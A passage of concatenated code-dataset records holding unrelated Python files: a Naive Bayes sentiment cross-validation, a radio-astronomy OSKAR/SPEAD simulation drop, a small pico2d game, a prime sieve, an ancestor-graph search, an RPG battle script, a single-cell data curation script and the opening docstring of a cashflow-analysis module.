folds == i and review[\"sentiment\"] == \"POS\")]\n test_neg = [review for review in reviews if (review[\"cv\"] % folds == i and review[\"sentiment\"] == \"NEG\")]\n\n\n frequencies = {}\n createFreqs(train_pos, \"POS\", frequencies)\n createFreqs(train_neg, \"NEG\", frequencies)\n\n kappa = 1\n # Count total appearance frequencies\n total = {\"POS\": len(frequencies) * kappa, \"NEG\": len(frequencies) * kappa}\n for word in frequencies:\n total[\"POS\"] += frequencies[word][\"POS\"]\n total[\"NEG\"] += frequencies[word][\"NEG\"]\n # Get the log prob of a word for each sentiment\n for word in frequencies:\n frequencies[word][\"logP(POS)\"] = np.log((frequencies[word][\"POS\"] + kappa) / (total[\"POS\"]))\n frequencies[word][\"logP(NEG)\"] = np.log((frequencies[word][\"NEG\"] + kappa) / (total[\"NEG\"]))\n\n total_reviews = len(train_pos) + len(train_neg)\n logP_c = {\"POS\": np.log(len(train_pos)/total_reviews), \"NEG\": np.log(len(train_neg)/total_reviews)}\n pos_test_results = test(test_pos, frequencies, logP_c)\n neg_test_results = test(test_neg, frequencies, logP_c)\n\n k1_pos_accuracy, k1_pos_results = getAccuracy(pos_test_results)\n k1_neg_accuracy, k1_neg_results = getAccuracy(neg_test_results)\n print(\"Positive review accuracy: \", k1_pos_accuracy)\n print(\"Negative review accuracy: \", k1_neg_accuracy)\n pos_scores.append(k1_pos_accuracy)\n neg_scores.append(k1_neg_accuracy)\n print(\"\")\n\n\nprint(\"Average fold positive review accuracy: \", np.mean(pos_scores))\nprint(\"Average fold negative review accuracy: \", np.mean(neg_scores))\n\nprint(\"Variance of positive review accuracy fold: \", np.var(pos_scores))\nprint(\"Variance of negative review accuracy fold: \", np.var(neg_scores))","sub_path":"Project_1/Bayes_CV.py","file_name":"Bayes_CV.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585626683","text":"import os\nimport csv\nimport copy\nimport logging\n\nfrom six.moves import configparser\n\nfrom oskar import SettingsTree\nfrom threading import Thread\nfrom multiprocessing import Process\nfrom dlg.drop import BarrierAppDROP\n\nfrom spead_recv import SpeadReceiver\nfrom spead_send import SpeadSender\n\nlogger = logging.getLogger(__name__)\n\n\nclass SignalGenerateAndAverageDrop(BarrierAppDROP):\n\n def initialize(self, **kwargs):\n\n # spead inputs\n self.stream_port = int(kwargs.get('stream_port', 51000))\n self.disconnect_tolerance = int(kwargs.get('disconnect_tolerance', 0))\n\n # oskar inputs\n self.start_freq = kwargs.get('start_freq')\n self.freq_step = kwargs.get('freq_step')\n self.num_freq_steps = int(kwargs.get('num_freq_steps'))\n self.use_gpus = int(kwargs.get('use_gpus', 0))\n self.telescope_model_path = kwargs.get('telescope_model_path')\n self.sky_model_file_path = kwargs.get('sky_model_file_path')\n self.obs_length = kwargs.get('obs_length', '06:00:00.0')\n self.num_time_steps = int(kwargs.get('num_time_steps', 5))\n self.use_adios = int(kwargs.get('use_adios', 0))\n\n # SPEAD send config template\n self.spead_send_conf = {\n \"stream_config\":\n {\n \"max_packet_size\": 1472,\n \"rate\": 0.0,\n \"burst_size\": 8000,\n \"max_heaps\": 4\n },\n \"stream\":\n {\n \"port\": 0,\n \"host\": \"127.0.0.1\"\n },\n \"write_ms\": 0\n }\n\n # SPEAD recv and avg local config template\n self.spead_avg_conf = {\n \"stream_config\":\n {\n \"max_packet_size\": 1472,\n \"rate\": 0.0,\n \"burst_size\": 8000,\n \"max_heaps\": 4\n },\n \"streams\":\n [],\n \"as_relay\": 1,\n \"relay\":\n {\n \"stream_config\":\n {\n \"max_packet_size\": 1472,\n \"rate\": 0.0,\n \"burst_size\": 8000,\n \"max_heaps\": 4\n },\n \"stream\":\n {\n \"port\": self.stream_port,\n \"host\": \"\"\n }\n }\n\n }\n\n # OSKAR config\n self.oskar_conf = {\n \"General\":\n {\n \"app\": \"oskar_sim_interferometer\",\n \"version\": \"2.7.0\"\n },\n \"simulator\":\n {\n \"max_sources_per_chunk\": 50000,\n \"use_gpus\": \"false\",\n \"cuda_device_ids\": 0,\n \"num_devices\": 1,\n \"double_precision\": \"false\",\n },\n \"sky\":\n {\n \"oskar_sky_model/file\": \"\"\n },\n \"observation\":\n {\n \"phase_centre_ra_deg\": 201.4,\n \"phase_centre_dec_deg\": -43.0,\n \"start_frequency_hz\": 0,\n \"num_channels\": 1,\n \"frequency_inc_hz\": 0,\n \"start_time_utc\": \"01-01-2000 20:00:00.0\",\n \"length\": self.obs_length,\n \"num_time_steps\": self.num_time_steps\n },\n \"telescope\":\n {\n \"input_directory\": self.telescope_model_path\n }\n }\n\n self.relay = None\n self.relay_process = None\n self.oskar_process = []\n\n self.spead_send = []\n self.spead_avg_local = []\n\n sky_model_file_list = self._load_sky_model_file_list(self.sky_model_file_path)\n\n for i in range(self.num_freq_steps):\n # creating N number of oskar and spead send configs\n spead_conf = copy.deepcopy(self.spead_send_conf)\n spead_conf[\"stream\"][\"port\"] = 41000 + i\n\n freq = self.start_freq + (self.freq_step * i)\n oskar_conf = copy.deepcopy(self.oskar_conf)\n oskar_conf[\"observation\"][\"start_frequency_hz\"] = freq\n oskar_conf[\"observation\"][\"frequency_inc_hz\"] = self.freq_step\n oskar_conf[\"simulator\"][\"cuda_device_ids\"] = i\n oskar_conf[\"simulator\"][\"use_gpus\"] = bool(self.use_gpus)\n\n # set model file for specific freq\n for key, value in sky_model_file_list:\n if key >= freq:\n oskar_conf[\"sky\"][\"oskar_sky_model/file\"] = value\n break\n\n if not oskar_conf[\"sky\"][\"oskar_sky_model/file\"]:\n raise Exception(\"Could not find sky model for freq %f\" % freq)\n\n self.spead_send.append({\"spead\": spead_conf, \"oskar\": oskar_conf})\n\n # Setting relay incoming streams\n self.spead_avg_local.append({\"host\": \"127.0.0.1\", \"port\": 41000+i})\n\n self.spead_avg_conf[\"streams\"] = self.spead_avg_local\n\n super(SignalGenerateAndAverageDrop, self).initialize(**kwargs)\n\n # list of csv values, each line is freq, abs_path_model_file\n def _load_sky_model_file_list(self, file_path):\n file_map = []\n with open(file_path) as csvfile:\n read_csv = csv.reader(csvfile, delimiter=',')\n for row in read_csv:\n file_map.append((int(row[0]), row[1]))\n return sorted(file_map, key=lambda kv: kv[0])\n\n def _start_oskar_process(self, spead_config, oskar_config_path):\n oskar = SpeadSender(spead_config=spead_config,\n oskar_settings=SettingsTree(\"oskar_sim_interferometer\",\n settings_file=oskar_config_path))\n oskar.run()\n oskar.finalise()\n\n def run(self):\n logger.info(\"SignalDrop Starting\")\n\n # assume a downstream AveragerSinkDrop\n self.outputs[0].write(b'init')\n\n # should be the IP address of the AveragerSinkDrop\n ip_address_sink = self.outputs[0].get_consumers_nodes()[0]\n\n self.spead_avg_conf[\"relay\"][\"stream\"][\"host\"] = ip_address_sink\n self.spead_avg_conf[\"relay\"][\"stream\"][\"port\"] = self.stream_port\n\n # pass this IP addr to spread relay config\n self.relay = SpeadReceiver(spead_config=self.spead_avg_conf,\n disconnect_tolerance=self.disconnect_tolerance)\n self.relay_thread = Thread(target=self.relay.run, args=())\n self.relay_thread.start()\n\n for i, conf in enumerate(self.spead_send):\n conf_path = \"/tmp/sim%d.ini\" % i\n parser = configparser.ConfigParser()\n parser.read_dict(conf['oskar'])\n with open(conf_path, 'w') as conf_file:\n parser.write(conf_file, space_around_delimiters=False)\n p = Process(target=self._start_oskar_process, args=(conf['spead'], conf_path))\n self.oskar_process.append(p)\n\n for oskar in self.oskar_process:\n oskar.start()\n\n for oskar in self.oskar_process:\n oskar.join()\n\n self.relay_thread.join()\n self.relay.close()\n\n logger.info(\"SignalDrop Finished\")\n","sub_path":"summit_demo/oskar/ingest/signal_drop.py","file_name":"signal_drop.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610494062","text":"import os\nimport math\nos.chdir('d:/SoHyun/문서/2DGP/수업내용/4주차')\nimport helper\nfrom pico2d import *\nRES_DIR='../res'\n\n\n\nopen_canvas()\n\nclass Grass:\n\tdef __init__(self):\n\t\tself.image=load_image(RES_DIR+'/grass.png')\n\tdef draw(self): \n\t\tself.image.draw(400,30)\n\tdef update(self):\n\t\tpass\n\nclass Boy:\n\tdef __init__(self):\n\t\tself.x, self.y = 400, 85\n\t\tself.dx, self.dy=0,0\n\t\tself.fidx=0\n\t\tself.image=load_image(RES_DIR+'/run_animation.png')\n\t\tself.towardx = 0\n\t\tself.towardy = 0 \n\tdef draw(self): \n\t\tself.image.clip_draw(self.fidx*100,0,100,100,self.x, self.y)\n\tdef update(self):\n\t\tself.x+=self.dx\n\t\tself.y+=self.dy\n\t\tself.fidx=(self.fidx+1)%8\n\tdef check(self):\n\t\tif self.check==True:\n\t\t\tself.dx, self.dy=0,0\n\nboy=Boy()\n\n\n\t\t\t\n\ngrass=Grass()\n\n\n\ndeltax=0\ndeltay=0\ntowardx=0\ntowardy=0\ndef handle_events():\n\tglobal running\t\n\tglobal boy\n\tglobal arrive\n\tevents=get_events()\n\tfor event in events:\n\t\tif event.type == SDL_QUIT:\n\t\t\trunning = False\n\t\telif(event.type, event.key) == (SDL_KEYDOWN, SDLK_ESCAPE):\n\t\t\trunning=False\n\t\telif event.type == SDL_MOUSEBUTTONDOWN:\n\t\t\tboy.towardx = event.x\n\t\t\tboy.towardy = get_canvas_height()-event.y-1\n\t\t\tboy.dx, boy.dy=helper.delta((boy.x,boy.y), (boy.towardx, boy.towardy), 5)\n\t\t\t(deltax, deltay) = helper.delta((boy.x, boy.y), (towardx,towardy), 5)\n\n\n\n\n\nrunning = True\nwhile running:\n\tclear_canvas()\n\tgrass.draw()\n\tboy.draw()\n\tupdate_canvas()\n\n\thandle_events()\n\t(posx, posy), done = helper.move_toward((boy.x, boy.y), (boy.dx, boy.dy), (boy.towardx, boy.towardy))\n\tif done==True:\n\t\tboy.x, boy.y=posx,posy\n\n\tboy.update()\n\tgrass.update()\n\n\tif boy.x>get_canvas_width():\n\t\trunning=False\n\n\tdelay(0.01)\n\nclose_canvas()","sub_path":"수업내용/4주차/py_02_06_2019182038_1.py","file_name":"py_02_06_2019182038_1.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"570711130","text":"__author__ = 'Дмитрий'\n\nimport math\n\ndef atkin( begin = 1,end = 100000):\n result = [ ]\n if begin <= 5:\n result.append(2)\n result.append(3)\n result.append(5)\n\n limit = int(math.sqrt(end)) +1\n sieve = [False]*len( range(begin,end + 1) )\n tmp = []\n for x in range( begin,limit ):\n for y in range( begin,limit ):\n\n n = 4*x**2 + y**2\n d = lambda z: z % 12\n if ( n <= end ) and ( d(n) == 1 or d(n) == 5 ):\n sieve[n] = not sieve[n]\n\n n = 3*x**2 + y**2\n if ( n <= end ) and d(n) == 7:\n sieve[n] = not sieve[n]\n\n if x > y:\n n = 3*x**2 - y**2\n if ( n <= end ) and d(n) == 11:\n sieve[n] = not sieve[n]\n\n for index in range(5,limit):\n if sieve[index]:\n for jndex in range(index**2,end,index**2):\n sieve[jndex]=False\n\n for index in range(7,end):\n if sieve[index]:\n result.append(index)\n\n return result\n\n\n\nprint(atkin(1,200000)[10000])\n\n\n\n\n\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197891834","text":"from util import Stack, Graph\n\ndef earliest_ancestor(ancestors, starting_node):\n ancestor_tree = Graph()\n for (parent, child) in ancestors:\n \tancestor_tree.add_vertex(parent)\n \tancestor_tree.add_vertex(child)\n \tancestor_tree.add_edge(child, parent)\n stack = Stack()\n stack.push([starting_node])\n longest_path = 1\n earliest_ancestor = -1\n while stack.size() > 0:\n \tpath = stack.pop()\n \tvertex = path[-1]\n \tif (len(path) >= longest_path and vertex < earliest_ancestor) or (len(path) > longest_path):\n \t\tearliest_ancestor = vertex\n \t\tlongest_path = len(path)\n \tfor neighbor in ancestor_tree.get_neighbors(vertex):\n \t\tnew_path = list(path)\n \t\tnew_path.append(neighbor)\n \t\tstack.push(new_path)\n \n return earliest_ancestor","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145930893","text":"import random\nimport time\n\n# ACTIVITY #1\n# class ChessBoard():\n# coordinates for everything\n# which side each piece belongs to\n# Whose turn it is\n\n# class ChessPiece():\n# properties of each piece\n# captured pieces\n\n# ACTIVITY 2\nmoves = 0\n\n\nclass Healer:\n # Check = shows all of the character's attributes like:\n # level\n # name\n # starting health\n # defense\n # attack\n # Heal self = + 50-100 health to self (character specific; dictated by lv)\n # Hit = invoked by an attacker when they attack\n # Fiery Chasm + Pyroclastic Rain = attacks\n def __init__(self, level, name, orientation):\n self.level = level # 3\n self.name = name\n self.health = 100 + ((level + 1) * 10)\n self.defense = (level + 1) * 3\n self.attack = (level + 1) * 5\n if orientation == \"f\":\n self.pos_pronoun = \"her\"\n elif orientation == \"m\":\n self.pos_pronoun = \"his\"\n else:\n self.pos_pronoun = \"their\"\n\n def check(self):\n print(\"\\n\\n\", self.name, \"is checking\", self.pos_pronoun, \"stats...\\nMage Level:\", self.level, \"\\nName:\",\n self.name, \"\\nMax Health:\", self.health, \"\\nDefense:\", self.defense, \"\\nAttack:\", self.attack)\n\n def heal_self(self):\n self.health += random.randint(10, 20) * (self.level + 1)\n if self.health > 100 + ((self.level + 1) * 10):\n self.health = 100 + ((self.level + 1) * 10)\n print(\"\\n\", self.name, \"cast 'Heal self'!\\n\", self.name + \"'s Health:\", str(self.health) + \"/\" +\n str(100 + ((self.level + 1) * 10)), \"(\" + str((self.health * 100) // (100 + ((self.level + 1) * 10))) +\n \"%)\")\n\n def hit(self, damage, cause, attacker):\n print(\"\\n\", self.name, \"took {} damage from '{}' by the hand of {}!\\n\".format(damage, cause, attacker),\n self.name + \"'s Health:\", str(self.health) + \"/\" + str(100 + ((self.level + 1) * 10)), \"(\" +\n str((self.health * 100) // (100 + ((self.level + 1) * 10))) + \"%)\")\n\n def fiery_chasm(self, target):\n self_hit = random.randint(-3, 1)\n old_health = target.health\n target.health -= self.attack + random.randint(-15, 15)\n damage = old_health - target.health\n target.hit(damage, \"Fiery Chasm\", self.name)\n if self_hit is True:\n self.health -= round((damage / 2) - self.defense)\n print(\"\\nClytemnestra took\", str(round((damage / 2) - self.defense)), \"damage by her own hand after falling\\\n into\", self.pos_pronoun, \"own 'Fiery Chasm'!\\n\", self.name + \"'s Health:\", self.health)\n\n def pyro_rain(self, target):\n old_health = target.health\n target.health -= self.attack + random.randint(0, 20)\n damage = old_health - target.health\n target.hit(damage, \"Pyroclastic Rain\", self.name)\n\n\nclass DPS:\n # Check = shows all of the character's attributes like:\n # level\n # name\n # starting health\n # defense\n # attack\n # Defend = lose 5 health, get nothing, or gain 6-18 (character specific; dictated by lv)\n # Hit = invoked by an attacker when they attack\n # Spin Strike + Spear Throw = attacks\n def __init__(self, level, name, orientation):\n self.level = level # 4\n self.name = name\n self.health = 100 + ((level + 1) * 5)\n self.defense = (level + 1) * 3\n self.attack = (level + 1) * 10\n if orientation == \"f\":\n self.pos_pronoun = \"her\"\n elif orientation == \"m\":\n self.pos_pronoun = \"his\"\n else:\n self.pos_pronoun = \"their\"\n\n def check(self):\n print(\"\\n\\n\", self.name, \"is checking\", self.pos_pronoun, \"stats...\\nWarrior Level:\", self.level, \"\\nName:\",\n self.name, \"\\nMax Health:\", self.health, \"\\nDefense:\", self.defense, \"\\nAttack:\", self.attack)\n\n def defend(self):\n defended = random.randint(-1, 3) * (self.defense + 1)\n self.health += defended\n if self.health > 100 + ((self.level + 1) * 5):\n self.health = 100 + ((self.level + 1) * 5)\n if defended <= 0:\n print(\"\\n\", self.name, \"'defended,' but it didn't help!\\n\", self.name + \"'s Health:\", str(self.health) + \"/\"\n + str(100 + ((self.level + 1) * 5)), \"(\" + str((self.health * 100) // (100 + ((self.level + 1) * 5)))\n + \"%)\")\n else:\n print(\"\\n\", self.name, \"'defended'!\\n\", self.name + \"'s Health:\", str(self.health) + \"/\" +\n str(100 + ((self.level + 1) * 5)), \"(\" + str((self.health * 100) // (100 + ((self.level + 1) * 5))) +\n \"%)\")\n\n def hit(self, damage, cause, attacker):\n print(\"\\n\", self.name, \"took {} damage from '{}' by the hand of {}!\\n\".format(damage, cause, attacker),\n self.name + \"'s Health:\", str(self.health) + \"/\" + str(100 + ((self.level + 1) * 5)), \"(\" +\n str((self.health * 100) // (100 + ((self.level + 1) * 5))) + \"%)\")\n\n def spin_strike(self, target):\n old_health = target.health\n target.health -= ((self.attack + random.randint(-5, 15)) - target.defense)\n damage = old_health - target.health\n target.hit(damage, \"Spinning Strike\", self.name)\n\n def spear_throw(self, target):\n old_health = target.health\n target.health -= ((self.attack + random.randint(-7, 20)) - target.defense)\n damage = old_health - target.health\n target.hit(damage, \"Spear Throw\", self.name)\n\n\nC = Healer(4, \"Clytemnestra\", \"f\")\nO = DPS(4, \"Orestes\", \"m\")\nC.check()\ntime.sleep(random.randint(5, 10))\nO.check()\ntime.sleep(random.randint(5, 10))\nwhile C.health > 0 and O.health > 0:\n if C.health < 50:\n C.heal_self()\n elif O.health >= 63:\n C.fiery_chasm(O)\n elif O.health < 63:\n C.pyro_rain(O)\n time.sleep(random.randint(3, 8))\n moves += 1\n if O.health <= 0:\n break\n elif O.health < 40:\n O.defend()\n elif C.health >= 75:\n O.spin_strike(C)\n elif C.health < 75:\n O.spear_throw(C)\n time.sleep(random.randint(3, 8))\n moves += 1\nif C.health > 0 and O.health > 0:\n print(\"\\\"Never excuse—for when the players are all\\\\dead, there needs none to be blamed,\\\" - Shakespeare, A \\\nMidsummer Night's Dream (5.1.346-347).\")\nelif C.health > 0:\n print(\"\\n\", O.name, \"has perished at\", O.health, \"health!\\n\", C.name, \"stands victorious with\", C.health,\n \"health remaining after\", str(moves), \"moves!\")\nelif O.health > 0:\n print(\"\\n\", C.name, \"has perished at\", C.health, \"health!\\n\", O.name, \"stands victorious with\", O.health,\n \"health remaining after\", str(moves), \"moves!\")\n","sub_path":"Practice8.py","file_name":"Practice8.py","file_ext":"py","file_size_in_byte":6638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135028926","text":"import anndata\nimport numpy as np\nimport pandas as pd\nimport scanpy.api as sc\n\nimport utils.hgnc\nimport utils.ontology\n\n\ndef basic_curation(adata):\n adata.obs[\"assay\"] = \"Microwell-seq\"\n adata.obs[\"assay_ontology\"] = \"\"\n adata.obs[\"disease_ontology\"] = \"PATO:0000461\"\n adata.obs[\"disease\"] = utils.ontology.get_ontology_label(\"PATO:0000461\")\n\n adata.uns[\"organism_ontology\"] = \"NCBITaxon:9606\"\n adata.uns[\"organism\"] = utils.ontology.get_ontology_label(\"NCBITaxon:9606\")\n adata.uns[\"title\"] = \"Construction of a human cell landscape at single-cell level\"\n adata.uns[\"contributors\"] = [\n {\"name\": \"Huiyu Sun\", \"institution\": \"Zhejiang University School of Medicine\", \"email\": \"sunhuiyu@zju.edu.cn\"},\n {\"name\": \"Guoji Guo\", \"institution\": \"Zhejiang University School of Medicine\", \"email\": \"ggj@zju.edu.cn\"},\n ]\n\n adata.uns[\"publication_doi\"] = \"https://doi.org/10.1038/s41586-020-2157-4\"\n\n adata.uns[\"project_name\"] = adata.uns[\"title\"]\n adata.uns[\"project_description\"] = (\n \"Single-cell analysis is a valuable tool for dissecting cellular heterogeneity in complex systems. \"\n \"However, a comprehensive single-cell atlas has not been achieved for humans. Here we use single-cell \"\n \"mRNA sequencing to determine the cell-type composition of all major human organs and construct a scheme \"\n \"for the human cell landscape (HCL). We have uncovered a single-cell hierarchy for many tissues that have \"\n \"not been well characterized. We established a 'single-cell HCL analysis' pipeline that helps to define \"\n \"human cell identity. Finally, we performed a single-cell comparative analysis of landscapes from human \"\n \"and mouse to identify conserved genetic networks. We found that stem and progenitor cells exhibit \"\n \"strong transcriptomic stochasticity, whereas diferentiated cells are more distinct. Our results provide a\"\n \"useful resource for the study of human biology.\"\n )\n adata.uns[\"project_protocol_links\"] = []\n adata.uns[\"project_raw_data_links\"] = [\"https://figshare.com/articles/HCL_DGE_Data/7235471\"]\n adata.uns[\"project_other_links\"] = [\n \"https://db.cngb.org/HCL/\",\n \"https://github.com/ggjlab/HCL/\",\n ]\n\n\ndef remix(adata):\n\n # Handle tissue. This one has lots of them, and the original name collides with the corpora name\n adata.obs.rename(columns={\"tissue\": \"original_tissue\"}, inplace=True)\n tissue_ontology_map = {\n \"AdultLung\": \"UBERON:0002048\",\n \"FetalIntestine\": \"UBERON:0000160\",\n \"AdultAdrenalGland\": \"UBERON:0002369\",\n \"AdultKidney\": \"UBERON:0002113\",\n \"FetalKidney\": \"UBERON:0002113\",\n \"AdultPleura\": \"UBERON:0000977\",\n \"FetalPancreas\": \"UBERON:0001264\",\n \"FetalMuscle\": \"UBERON:0001630\",\n \"FetalLiver\": \"UBERON:0002107\",\n \"AdultPeripheralBlood\": \"UBERON:0000178\",\n \"AdultTransverseColon\": \"UBERON:0001157\",\n \"CordBloodCD34P\": \"UBERON:0012168\",\n \"AdultSpleen\": \"UBERON:0002106\",\n \"AdultStomach\": \"UBERON:0000945\",\n \"FetalAdrenalGland\": \"UBERON:0002369\",\n \"FetalBrain\": \"UBERON:0000955\",\n \"FetalMaleGonad\": \"UBERON:0000473\",\n \"AdultOmentum\": \"UBERON:0003688\",\n \"AdultThyroid\": \"UBERON:0002046\",\n \"AdultEsophagus\": \"UBERON:0001043\",\n \"AdultLiver\": \"UBERON:0002107\",\n \"AdultTrachea\": \"UBERON:0003126\",\n \"ChorionicVillus\": \"UBERON:0007106\",\n \"AdultGallbladder\": \"UBERON:0002110\",\n \"AdultPancreas\": \"UBERON:0001264\",\n \"AdultArtery\": \"UBERON:0001637\",\n \"FetalLung\": \"UBERON:0002048\",\n \"Placenta\": \"UBERON:0001987\",\n \"AdultTemporalLobe\": \"UBERON:0001871\",\n \"AdultBladder\": \"UBERON:0018707\",\n \"AdultBoneMarrow\": \"UBERON:0002371\",\n \"AdultCervix\": \"UBERON:0000002\",\n \"FetalHeart\": \"UBERON:0000948\",\n \"FetalStomach\": \"UBERON:0000945\",\n \"AdultMuscle\": \"UBERON:0001630\",\n \"AdultUterus\": \"UBERON:0000995\",\n \"AdultCerebellum\": \"UBERON:0002037\",\n \"FetalSkin\": \"UBERON:0002097\",\n \"FetalFemaleGonad\": \"UBERON:0000992\",\n \"CordBlood\": \"UBERON:0012168\",\n \"AdultFallopiantube\": \"UBERON:0003889\",\n \"FetalRib\": \"UBERON:0002228\",\n \"FetalSpinalCord\": \"UBERON:0002240\",\n \"NeonatalAdrenalGland\": \"UBERON:0002369\",\n \"AdultRectum\": \"UBERON:0001052\",\n \"AdultJeJunum\": \"UBERON:0002115\",\n \"FetalCalvaria\": \"UBERON:0004339\",\n \"AdultDuodenum\": \"UBERON:0002114\",\n \"FetalThymus\": \"UBERON:0002370\",\n \"AdultEpityphlon\": \"UBERON:0001154\",\n \"AdultIleum\": \"UBERON:0002116\",\n \"AdultSigmoidColon\": \"UBERON:0001159\",\n \"AdultHeart\": \"UBERON:0000948\",\n \"AdultProstate\": \"UBERON:0002367\",\n \"AdultUreter\": \"UBERON:0000056\",\n \"AdultAscendingColon\": \"UBERON:0001156\",\n \"FetalEyes\": \"UBERON:0000970\",\n \"HESC\": \"\",\n \"AdultAdipose\": \"UBERON:0001013\",\n }\n tissue_map = {k: utils.ontology.get_ontology_label(v) for k, v in tissue_ontology_map.items()}\n tissue_map[\"HESC\"] = \"HESC\"\n adata.obs[\"tissue_ontology\"] = adata.obs[\"original_tissue\"].replace(tissue_ontology_map, inplace=False)\n adata.obs[\"tissue\"] = adata.obs[\"original_tissue\"].replace(tissue_map, inplace=False)\n\n adata.obs[\"cell_type_ontology\"] = \"\"\n adata.obs[\"cell_type\"] = \"\"\n adata.obs[\"ethnicity_ontology\"] = \"HANCESTRO:0027\"\n adata.obs[\"ethnicity\"] = utils.ontology.get_ontology_label(\"HANCESTRO:0027\")\n adata.obs[\"sex\"] = \"unknown\"\n\n development_stage_ontology_map = {}\n for k in tissue_ontology_map:\n if k.startswith(\"Adult\") or k in (\n \"CordBlood\",\n \"Placenta\",\n \"ChorionicVillus\",\n \"CordBloodCD34P\",\n ):\n development_stage_ontology_map[k] = \"HsapDv:0000087\"\n elif k.startswith(\"Fetal\"):\n development_stage_ontology_map[k] = \"HsapDv:0000037\"\n elif k.startswith(\"Neonatal\"):\n development_stage_ontology_map[k] = \"HsapDv:0000082\"\n elif k == \"HESC\":\n development_stage_ontology_map[k] = \"HsapDv:0000002\"\n development_stage_map = {k: utils.ontology.get_ontology_label(v) for k, v in development_stage_ontology_map.items()}\n adata.obs[\"development_stage_ontology\"] = adata.obs[\"original_tissue\"].replace(\n development_stage_ontology_map, inplace=False\n )\n adata.obs[\"development_stage\"] = adata.obs[\"original_tissue\"].replace(development_stage_map, inplace=False)\n\n adata.uns[\"layer_descriptions\"] = {\"X\": \"log1p CPM\"}\n\n upgraded_var_index = utils.hgnc.get_upgraded_var_index(adata.var)\n merged_df = pd.DataFrame(np.expm1(adata.X), index=adata.obs.index, columns=upgraded_var_index).sum(\n axis=1, level=0, skipna=False\n )\n\n remix_adata = anndata.AnnData(\n X=np.log1p(merged_df.to_numpy()),\n obs=adata.obs,\n var=merged_df.columns.to_frame(name=\"hgnc_gene_symbol\"),\n uns=adata.uns,\n obsm=adata.obsm,\n varm=adata.varm,\n )\n\n return remix_adata\n\n\ndef main():\n original_filename = \"human_cell_landscape-3-original.h5ad\"\n curated_filename = \"human_cell_landscape-3-curated.h5ad\"\n remixed_filename = \"human_cell_landscape-3-remixed.h5ad\"\n\n # Read raw, X has most of the genes filtered out\n adata = sc.read_h5ad(original_filename).raw.to_adata()\n basic_curation(adata)\n adata.write(curated_filename, compression=\"gzip\")\n remix_adata = remix(adata)\n remix_adata.write(remixed_filename, compression=\"gzip\")\n\n\nmain()\n","sub_path":"backend/scripts/curation/human_cell_landscape-3/curate.py","file_name":"curate.py","file_ext":"py","file_size_in_byte":7579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191629337","text":"\"\"\"\n\nNet present value\n===============================================================================\n\n\n>>> marr = nominal_rate([12]*5)\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> timevalue(cflo=cflo, marr=marr) # doctest: +ELLIPSIS\n103.73...\n\n\n>>> timevalue(cflo=[cflo, cflo], marr=marr) # doctest: +ELLIPSIS\n[103.73..., 103.73...]\n\n>>> timevalue(cflo=cflo, marr=[marr, marr]) # doctest: +ELLIPSIS\n[103.73..., 103.73...]\n\n>>> timevalue(cflo=[cflo, cflo], marr=[marr, marr]) # doctest: +ELLIPSIS\n[103.73..., 103.73...]\n\n>>> timevalue(cflo=[cflo, cflo], marr=[marr, marr], base_date=[4, 4]) # doctest: +ELLIPSIS\n[163.22..., 163.22...]\n\n\n\nNet uniform series\n===============================================================================\n\n>>> marr = nominal_rate([12]*5)\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> net_uniform_series(cflo, marr) # doctest: +ELLIPSIS\n116.18...\n\n\n>>> net_uniform_series([cflo, cflo], marr) # doctest: +ELLIPSIS\n[116.18..., 116.18...]\n\n>>> net_uniform_series(cflo, [marr, marr]) # doctest: +ELLIPSIS\n[116.18..., 116.18...]\n\n>>> net_uniform_series([cflo, cflo], [marr, marr]) # doctest: +ELLIPSIS\n[116.18..., 116.18...]\n\n>>> net_uniform_series([cflo, cflo], [marr, marr], nper=5) # doctest: +ELLIPSIS\n[28.77..., 28.77...]\n\n>>> net_uniform_series([cflo, cflo], [marr, marr], nper=[5, 5]) # doctest: +ELLIPSIS\n[28.77..., 28.77...]\n\n\n\n\nBenefit-Cost ratio\n===============================================================================\n\n>>> marr = nominal_rate([12]*5)\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> benefit_cost_ratio(cflo, marr) # doctest: +ELLIPSIS\n1.518...\n\n>>> benefit_cost_ratio([cflo, cflo], marr) # doctest: +ELLIPSIS\n[1.518..., 1.518...]\n\n>>> benefit_cost_ratio(cflo, [marr, marr]) # doctest: +ELLIPSIS\n[1.518..., 1.518...]\n\n>>> benefit_cost_ratio([cflo, cflo], [marr, marr]) # doctest: +ELLIPSIS\n[1.518..., 1.518...]\n\n>>> benefit_cost_ratio([cflo, cflo], [marr, marr], [0, 0]) # doctest: +ELLIPSIS\n[1.518..., 1.518...]\n\n\n\n\nInternal Rate of Return\n===============================================================================\n\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> irr(cflo) # doctest: +ELLIPSIS\n34.90...\n\nModified Internal Rate of Return\n===============================================================================\n\n>>> cflo = cashflow([100]*5, spec=(0, -200))\n>>> mirr(cflo) # doctest: +ELLIPSIS\n18.92...\n\n\nDescription of the functions in this module\n===============================================================================\n\n\n\"\"\"\n\nimport numpy as np\nfrom cashflows.gtimeseries import TimeSeries, cashflow, nominal_rate, verify_eq_time_range\nfrom cashflows.gcashcomp import to_discount_factor, equivalent_nrate, vars2list\nfrom cashflows.basics import tvmm\nfrom cashflows.utilityfun import exp_utility_fun, log_utility_fun, sqrt_utility_fun\n# from cashflows.basics import amort\n\n\n\ndef timevalue(cflo, marr, base_date=0, utility=None):\n \"\"\"\n Computes the net value of a cashflow at time `base_date`.\n\n Args:\n cflo (TimeSeries, list of TimeSeries): cashflow.\n marr 